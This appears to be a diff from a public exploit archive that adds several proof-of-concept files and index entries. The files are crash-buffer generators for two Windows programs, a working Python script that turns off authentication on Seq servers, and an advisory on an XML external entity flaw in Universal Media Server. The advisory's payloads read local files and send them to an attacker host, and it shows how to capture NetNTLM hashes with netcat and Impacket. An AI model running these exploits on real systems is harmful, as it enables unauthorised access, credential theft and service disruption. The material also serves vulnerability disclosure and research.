# Vulnerability Type: SEH Overwrite POC
# Discovery by: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
# Discovey Date: 2018-08-01
# Software Link: http://www.alloksoft.com/fast_splitter.htm
# Tested Version: 1.2
# Tested on OS: Windows XP Service Pack 3 x86
# Steps to Reproduce:
# Run the python exploit.py , Open "exploit.txt" and copy content.
# Open Fast AVI MPEG Splitter , A registration prompt will appear.
# In the License field paste the content of "exploit.txt".
# Press "OK" and B00m Crashed.
#!/usr/bin/env python
# SEH chain of main thread, item 0
# Address=00129B78
# SE handler=43434343
# SEH chain of main thread, item 1
# Address=42424242
# SE handler=*** CORRUPT ENTRY ***
buffer = "\x41" * 544
nseh = "\x42\x42\x42\x42"
seh= "\x43\x43\x43\x43"
exploit = buffer + nseh + seh
f = open ("exploit.txt", "w")
f.write(exploit)
f.close()

24
exploits/windows/local/45137.py Executable file
View file

@ -0,0 +1,24 @@
# Exploit Title: AgataSoft Auto PingMaster 1.5 - 'Host name' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2018-08-02
# Vendor Homepage: http://agatasoft.com/
# Software Link : http://agatasoft.com/Ping_Master.exe
# Tested Version: 1.5
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
# Steps to Produce the Crash:
# 1.- Run python code : python AgataSoft_Auto_PingMaster_1.5.py
# 2.- Open AgataSoft_Auto_PingMaster_1.5.txt and copy content to clipboard
# 3.- Open Ping_Master.exe
# 4.- Trace Route
# 5.- Paste ClipBoard on "Host name:"
# 6.- Get IP from host name
# 7.- Crashed
#!/usr/bin/env python
buffer = "\x41" * 742
f = open ("AgataSoft_Auto_PingMaster_1.5.txt", "w")
f.write(buffer)
f.close()

82
exploits/windows/webapps/45136.py Executable file
View file

@ -0,0 +1,82 @@
# Exploit Title: Seq 4.2.476 - Authentication Bypass
# Date: 2018-08-02
# Exploit Author: Daniel Chactoura
# Vendor Homepage: https://getseq.net/
# Software Link: https://getseq.net/Download/All
# Version: <= 4.2.476
# CVE : CVE-2018-8096
# Post Reference: https://medium.com/stolabs/bypass-admin-authentication-on-seq-17f0f9e02732
# coding=utf-8
#!/bin/python
import sys
import requests
def verifyArgs(args):
if len(args) < 2:
print('[!] Usage: '+str(args[0])+' https://target')
exit(0)
elif 'http' not in str(args[1]):
print('''[!] Missing "https://" !''')
exit(0)
else:
return(1)
def verifyVersion(url):
vulnVersions = ['4.2.476','4.2.470','4.1.17','4.1.16',
'4.1.14','4.0.60','4.0.58','3.4.20',
'3.4.18','3.4.17','3.3.23','3.3.22',
'3.3.21','3.3.20','3.2.16','3.1.17',
'3.1.16','3.0.30','2.4.2','2.3.4',
'2.3.3','2.2.8','2.1.22','2.1.21',
'2.0.19','1.6.13','1.6.12','1.6.11',
'1.6.10','1.6.9','1.6.8','1.6.7',
'1.6.6','1.6.5','1.6.4','1.5.19',
'1.5.18','1.5.17','1.5.16','1.4.12',
'1.4.11','1.4.10','1.4.9','1.4.8',
'1.4.7','1.4.6','1.3.11','1.3.10',
'1.3.9','1.3.8']
u = str(url)
verifV = requests.get(u+'/api/')
verifVJSON = verifV.json()
ver = str(verifVJSON['Version'])[:-2]
if ver in vulnVersions:
print("[+] Seq's version is potentially vulnerable!")
return(1)
else:
print("[!] Seq's version is probably not vulnerable!")
return(0)
def bypassAuth(url):
u = str(url)
payload = "{'Name':'isauthenticationenabled','Value':false,'Id':'setting-isauthenticationenabled','Links':{'Self':'api/settings/setting-isauthenticationenabled','Group':'api/settings/resources'}}"
h = {'User-Agent':'Mozilla/5.0 (X11; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0', 'Referer':u}
verifM = requests.put(u+'/api/settings/setting-isauthenticationenabled', data=payload, headers=h)
verifMCode = str(verifM.status_code)
if verifMCode == '200':
print("[:)] YES! Success! Now, access the url and have fun!")
else:
print("[:(] DAMN! This is not your lucky day...")
def main():
try:
if verifyArgs(sys.argv):
if verifyVersion(sys.argv[1]):
bypassAuth(sys.argv[1])
else:
c = input('[?] Do you want to try it anyway? (y/n): ').lower()
if c == 'y':
pass
elif c == 'n':
exit(0)
else:
print('[!] Invalid choice!')
exit(0)
except KeyboardInterrupt:
exit(0)
if __name__ == '__main__':
main()

139
exploits/xml/webapps/45133.txt Normal file
View file

@ -0,0 +1,139 @@
Issue: Out-of-Band XXE in Universal Media Server's SSDP Processing
Reserved CVE: CVE-2018-13416
# Vulnerability Overview
The XML parsing engine for Universal Media Server's SSDP/UPNP functionality is vulnerable to an XML External Entity Processing (XXE) attack. Unauthenticated attackers on the same LAN can use this vulnerability to:
- Access arbitrary files from the filesystem with the same permission as the user account running UMS.
- Initiate SMB connections to capture NetNTLM challenge/response and crack to clear-text password.
- Initiate SMB connections to relay NetNTLM challenge/response and achieve Remote Command Execution in Windows domains.
Exploitation can be demonstrated using evil-ssdp (https://gitlab.com/initstring/evil-ssdp).
# Discovered By
Chris Moberly @ The Missing Link Security
# Vendor Status
UMS team responded to notification within an hour, patch in progress.
# Vulnerability Details
Atack type: Remote, unauthenticated
Impact: Information disclosure up to code execution
Affected component: UMS's SSDP discovery / XML parsing
Operating Systems affected: Verified Windows 10 (likely all versions)
UMS version affected: Tested on 7.1.0 (current as of July 2018). Older versions likely also vulnerable.
Attack vector: XXE
# Technical Overview
UMS, like many other media servers, will attempt to discover other devices on a local network. The discovery process is handled by Simple Service Discovery Protocol (SSDP), which sends a UDP multicast out to 239.255.255.250 on port 1900. This is the first step in finding and adding Universal Plug and Play (UPNP) devices.
We can reply to that UDP multicast directly on the same port that the request initiated from, informing this client that we have a shared device. When we do this, we provide the location of an XML file containing more information about our device. This is called a Device Descriptor.
UMS will automatically access the Device Descriptor over HTTP, parsing the XML content. This is expected behaviour for SSDP/UPNP.
By hosting a specially crafted XML file at that location, we can force UMS to do several things. The POC used to prove this vulnerability (POC 1 below) contained the following XML content:
```
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file://///$smbServer/smb/hash.jpg" >
<!ENTITY xxe-url SYSTEM "http://$localIp:$localPort/ssdp/xxe.html" >
]>
<hello>&xxe;&xxe-url;</hello>
<root>
<specVersion>
<major>1</major>
<minor>0</minor>
</specVersion>
<device>
```
When UMS parses this, it does two things:
1. Accesses the SMB share running at the $smbServer variable. This allows us to collect or relay the NetNTLM challenge/response.
2. Accesses an HTTP server at the $localIp variable. This is used for verification purposes while testing the vulnerability.
The unexpected behaviour here is the ability to provide the `ENTITY` tags, forcing UMS to automatically access file paths and HTTP URLs.
# POC 1: Capcturing NetNTLM Challenge/Response
This is a common attack method inside a Windows domain, where compromising an account can assist with moving laterally through the network.
This vulnerability can be easily validated using the [evil-ssdp tool found here](https://gitlab.com/initstring/evil-ssdp).
The process is:
1. Execute the evil-ssdp tool as follows from a Linux host:
```
essdp.py eth0 -t xxe-smb # instructs tool to use the 'xxe' template for zero-day hunting
```
2. From the same Linux host, either launch a simple netcat listener like this:
```
sudo nc -nlvp 445
```
or use Impacket to listen and extract the NetNTLM challenge/response as follows:
```
sudo python examples/smbserver.py smb /tmp/smb/
```
3. From a Windows host on the same network, simply restart UMS. evil-ssdp will display messages like the following:
```
[XML REQUEST] Host: 10.0.200.10, User-Agent: UMS/7.1.0 Windows10/10.0 UPnP/1.0 Cling/2.0
GET /ssdp/device-desc.xml
```
When that happens, either the netcat listener or the Impacket SMB server will receive the connection. If using Impacket, you will now have the NetNTLM challenge/response of the user running UMS. This can be cracked to clear-text using tools like Hashcat. Alternatively, you can use Impacket to relay that hash to another machine on the network, achieving remote code execution.
# POC 2: Accessing Arbitrary Files
If an attacker knows specifically what files they are looking for, this same vulnerability can be used to extract that information. Essentially, an XML entity will be defined as a variable, storing the output of a file on the machine where UMS is installed. Then, an HTTP request will be sent to the attacker's machine that includes that variable. The attacker will be able to see this file in their HTTP server logs.
We need two files hosted on the attacking server to do this. The initial Device Descriptor sent is:
```
<!DOCTYPE data[
<!ENTITY % file SYSTEM "file:///C:/users/public/pwned.txt">
<!ENTITY % dtd SYSTEM "http://$localIp:$localPort/ssdp/data.dtd">
%dtd;
]>
<data>&send;</data>
```
Which triggers another connection request to the following data.dtd file:
```
<!ENTITY % all "<!ENTITY send SYSTEM 'http://$localIp:$localPort/?exfiltrated=%file;'>">
%all;
```
We can also verify this using the evil-ssdp tool, using the 'xxe-exfil' template. For this POC, only extraction of 1-line files was found to be possible.
To reproduce:
1. Create a test file 'C:\Users\Public\pwned.txt' on the Windows hosts where UMS is installed. Please 1 line of text with no whitespaces inside, like this:
```
secretstuff!
```
2. Execute the evil-ssdp tool as follows from a Linux host on the same network:
```
essdp.py eth0 -t xxe-exfil # instructs tool to use the 'xxe-exfil' template for zero-day hunting
```
3. Back on the Windows host, simply restart UMS. evil-ssdp will display messages like the following
```
[XML REQUEST] Host: 10.0.200.10, User-Agent: UMS/7.1.0 Windows10/10.0 UPnP/1.0 Cling/2.0
GET /ssdp/device-desc.xml
[XXE VULN!!!!] Host: 10.0.200.10, User-Agent: Java/1.8.0_171
GET /ssdp/data.dtd
[EXFILTRATION] Host: 10.0.200.10, User-Agent: Java/1.8.0_171
GET /?exfiltrated=secretstuff!
```

15
files_exploits.csv
View file

@ -9840,11 +9840,16 @@ id,file,description,date,author,type,platform,port
45048,exploits/multiple/local/45048.js,"JavaScript Core - Arbitrary Code Execution",2018-07-11,ret2,local,multiple,
45058,exploits/linux/local/45058.rb,"Linux - BPF Sign Extension Local Privilege Escalation (Metasploit)",2018-07-19,Metasploit,local,linux,
45071,exploits/windows/local/45071.py,"Splinterware System Scheduler Pro 5.12 - Buffer Overflow (SEH)",2018-07-23,bzyo,local,windows,
45126,exploits/solaris/local/45126.c,"Sun Solaris 11.3 AVS - Local Kernel root Exploit",2018-08-02,mu-b,local,solaris,
45085,exploits/windows/local/45085.py,"10-Strike Bandwidth Monitor 3.7 - Local Buffer Overflow (SEH)",2018-07-25,absolomb,local,windows,
45086,exploits/windows/local/45086.py,"10-Strike LANState 8.8 - Local Buffer Overflow (SEH)",2018-07-25,absolomb,local,windows,
45089,exploits/linux/local/45089.py,"Intenos IOPSYS - (Authenticated) Local Privilege Escalation",2018-07-21,neonsea,local,linux,
45101,exploits/windows/local/45101.py,"Allok MOV Converter 4.6.1217 - Buffer Overflow (SEH)",2018-07-30,"Shubham Singh",local,windows,
45120,exploits/windows/local/45120.py,"Allok Fast AVI MPEG Splitter 1.2 - Buffer Overflow (PoC)",2018-08-01,"Shubham Singh",local,windows,
45107,exploits/macos/local/45107.txt,"Charles Proxy 4.2 - Local Privilege Escalation",2018-07-30,"Mark Wadham",local,macos,
45137,exploits/windows/local/45137.py,"AgataSoft Auto PingMaster 1.5 - 'Host name' Denial of Service (PoC)",2018-08-02,"Luis Martínez",local,windows,
45130,exploits/linux/local/45130.py,"Imperva SecureSphere 11.5 / 12.0 / 13.0 - Privilege Escalation",2018-08-02,0x09AL,local,linux,
45132,exploits/linux/local/45132.rb,"SecureSphere 12.0.0.50 - SealMode Shell Escape (Metasploit)",2018-08-02,0x09AL,local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -39588,7 +39593,7 @@ id,file,description,date,author,type,platform,port
44786,exploits/php/webapps/44786.txt,"Joomla! Component Full Social 1.1.0 - 'search_query' SQL Injection",2018-05-28,L0RD,webapps,php,
44788,exploits/php/webapps/44788.html,"Joomla! Component jCart for OpenCart 2.3.0.2 - Cross-Site Request Forgery",2018-05-28,L0RD,webapps,php,
44789,exploits/php/webapps/44789.html,"Joomla! Component JoomOCShop 1.0 - Cross-Site Request Forgery",2018-05-28,L0RD,webapps,php,
44790,exploits/php/webapps/44790.txt,"wityCMS 0.6.1 - Cross-Site Scripting",2018-05-28,"Nathu Nandwani",webapps,php,
44790,exploits/php/webapps/44790.txt,"wityCMS 0.6.1 - Cross-Site Scripting",2018-05-28,"Nathu Nandwani",webapps,php,80
44792,exploits/asp/webapps/44792.txt,"IssueTrak 7.0 - SQL Injection",2018-05-29,"Chris Anastasio",webapps,asp,
44793,exploits/php/webapps/44793.txt,"Sitemakin SLAC 1.0 - 'my_item_search' SQL Injection",2018-05-29,"Divya Jain",webapps,php,
44794,exploits/hardware/webapps/44794.txt,"NUUO NVRmini2 / NVRsolo - Arbitrary File Upload",2018-05-29,M3@Pandas,webapps,hardware,
@ -39721,6 +39726,7 @@ id,file,description,date,author,type,platform,port
45083,exploits/php/webapps/45083.rb,"Micro Focus Secure Messaging Gateway (SMG) < 471 - Remote Code Execution (Metasploit)",2018-07-24,"Mehmet Ince",webapps,php,
45070,exploits/hardware/webapps/45070.txt,"NUUO NVRmini - 'upgrade_handle.php' Remote Command Execution",2018-07-23,"Berk Dusunur",webapps,hardware,
45073,exploits/linux/webapps/45073.txt,"Synology DiskStation Manager 4.1 - Directory Traversal",2018-07-23,"Berk Dusunur",webapps,linux,
45125,exploits/php/webapps/45125.txt,"Chartered Accountant : Auditor Website 2.0.1 - Cross-Site Scripting",2018-08-02,"Vikas Chaudhary",webapps,php,80
45076,exploits/hardware/webapps/45076.py,"Davolink DVW 3200 Router - Password Disclosure",2018-07-23,"Ankit Anubhav",webapps,hardware,
45078,exploits/hardware/webapps/45078.py,"Tenda Wireless N150 Router 5.07.50 - Cross-Site Request Forgery (Reboot Router)",2018-07-23,"Nathu Nandwani",webapps,hardware,80
45084,exploits/hardware/webapps/45084.txt,"D-link DAP-1360 - Path Traversal / Cross-Site Scripting",2018-07-24,r3m0t3nu11,webapps,hardware,80
@ -39728,3 +39734,10 @@ id,file,description,date,author,type,platform,port
45094,exploits/linux/webapps/45094.txt,"Online Trade 1 - Information Disclosure",2018-07-27,Dhamotharan,webapps,linux,
45097,exploits/php/webapps/45097.txt,"SoftNAS Cloud < 4.0.3 - OS Command Injection",2018-07-27,"Core Security",webapps,php,
45105,exploits/linux/webapps/45105.py,"H2 Database 1.4.197 - Information Disclosure",2018-07-30,owodelta,webapps,linux,
45127,exploits/php/webapps/45127.html,"WityCMS 0.6.2 - Cross-Site Request Forgery (Password Change)",2018-08-02,"Porhai Eung",webapps,php,80
45128,exploits/php/webapps/45128.txt,"TI Online Examination System v2 - Arbitrary File Download",2018-08-02,AkkuS,webapps,php,80
45129,exploits/php/webapps/45129.txt,"PageResponse FB Inboxer Add-on 1.2 - 'search_field' SQL Injection",2018-08-02,AkkuS,webapps,php,80
45131,exploits/php/webapps/45131.py,"CoSoSys Endpoint Protector 4.5.0.1 - Authenticated Remote Root Command Injection",2018-08-02,0x09AL,webapps,php,
45133,exploits/xml/webapps/45133.txt,"Universal Media Server 7.1.0 - SSDP Processing XML External Entity Injection",2018-08-02,"Chris Moberly",webapps,xml,
45135,exploits/hardware/webapps/45135.txt,"ASUS DSL-N12E_C1 1.1.2.3_345 - Remote Command Execution",2018-08-02,"Fakhri Zulkifli",webapps,hardware,
45136,exploits/windows/webapps/45136.py,"Seq 4.2.476 - Authentication Bypass",2018-08-02,"Daniel Chactoura",webapps,windows,

Can't render this file because it is too large.